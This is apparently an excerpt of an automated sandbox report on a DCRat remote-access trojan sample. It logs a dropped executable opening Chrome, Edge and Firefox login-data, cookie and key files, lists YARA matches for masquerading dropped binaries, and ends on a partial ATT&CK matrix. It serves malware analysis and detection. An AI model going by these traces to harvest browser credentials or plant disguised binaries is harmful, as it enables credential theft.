                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data For Account-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data

                          Remote Access Functionality

                          barindex
                          Yara detected DCRat
                          Source: Yara matchFile source: zZ1Y43bxxV.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.zZ1Y43bxxV.exe.d0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000000.1643692191.00000000000D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000010.00000002.2909009031.000000000308A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000010.00000002.2909009031.00000000033A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000010.00000002.2909009031.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: zZ1Y43bxxV.exe PID: 6164, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: wnWNWNYIxJtFiUSDRXunzX.exe PID: 7744, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Extras\AutoUpdateIt\wnWNWNYIxJtFiUSDRXunzX.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\StartMenuExperienceHost.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\Public\UserOOBEBroker.exe, type: DROPPED

                          Mitre Att&ck Matrix

                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity Information1
                          Scripting                          		Valid Accounts141
                          Windows Management Instrumentation                          		1
                          Scripting                          		12
                          Process Injection                          		233
                          Masquerading                          		1
                          OS Credential Dumping                          		351
                          Security Software Discovery                          		Remote Services11
                          Archive Collected Data                          		2
                          Encrypted Channel                          		Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault AccountsScheduled Task/Job1
                          DLL Side-Loading                          		1
                          DLL Side-Loading                          		11
